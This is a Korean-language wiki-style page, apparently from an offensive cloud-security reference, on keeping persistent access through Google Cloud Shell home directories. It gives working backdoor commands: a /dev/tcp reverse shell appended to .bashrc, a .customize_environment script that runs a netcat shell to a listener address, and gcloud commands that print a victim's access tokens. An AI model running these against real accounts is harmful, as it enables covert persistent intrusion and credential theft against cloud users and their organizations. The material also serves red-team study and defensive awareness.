클라우드 셸

자세한 정보는 확인하세요:

지속적인 백도어

Google Cloud Shell은 브라우저에서 클라우드 리소스에 대한 명령줄 액세스를 제공하며 관련 비용이 없습니다.

Google Cloud Shell에는 웹 콘솔 또는 **gcloud cloud-shell ssh**를 실행하여 액세스할 수 있습니다.

이 콘솔에는 공격자에게 흥미로운 몇 가지 기능이 있습니다:

1. Google Cloud에 액세스 권한이 있는 모든 Google 사용자는 완전 인증된 Cloud Shell 인스턴스에 액세스할 수 있습니다(서비스 계정은 조직의 소유자일지라도 가능).

2. 해당 인스턴스는 활동이 없는 경우 최소 120일 동안 홈 디렉터리를 유지합니다.

3. 해당 인스턴스의 활동을 모니터링할 조직의 기능이 없습니다.

이는 공격자가 사용자의 홈 디렉터리에 백도어를 설치할 수 있고 사용자가 최소 120일마다 GC Shell에 연결한다면 백도어가 유지되어 공격자가 다음과 같이 실행될 때마다 쉘을 얻을 수 있다는 것을 기본적으로 의미합니다:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

홈 폴더에 **.customize_environment**라는 다른 파일이 있습니다. 이 파일이 존재하면 사용자가 클라우드 셸에 액세스할 때마다 실행됩니다 (이전 기술과 마찬가지로). 사용자가 클라우드 셸을 "자주" 사용하는 한 이전 백도어를 삽입하거나 다음과 유사한 백도어를 삽입하여 지속성을 유지할 수 있습니다:

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

이것은 클라우드 셸에서 gcloud projects list를 실행했을 때(공격자로) 브라우저 사용자 세션에서 본 팝업입니다:

그러나 사용자가 클라우드 셸을 활발히 사용한 경우 팝업이 나타나지 않고 사용자의 토큰을 수집할 수 있습니다.

gcloud auth print-access-token
gcloud auth application-default print-access-token

SSH 연결이 설정되는 방법

기본적으로 다음 3가지 API 호출이 사용됩니다:

• https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (로컬에서 생성한 공개 키를 추가하도록 함)

• https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (인스턴스를 시작하도록 함)

• https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (구글 클라우드 쉘의 IP를 알려줌)

그러나 여기에서 더 많은 정보를 찾을 수 있습니다.

참고 자료

• https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec

• https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

• https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/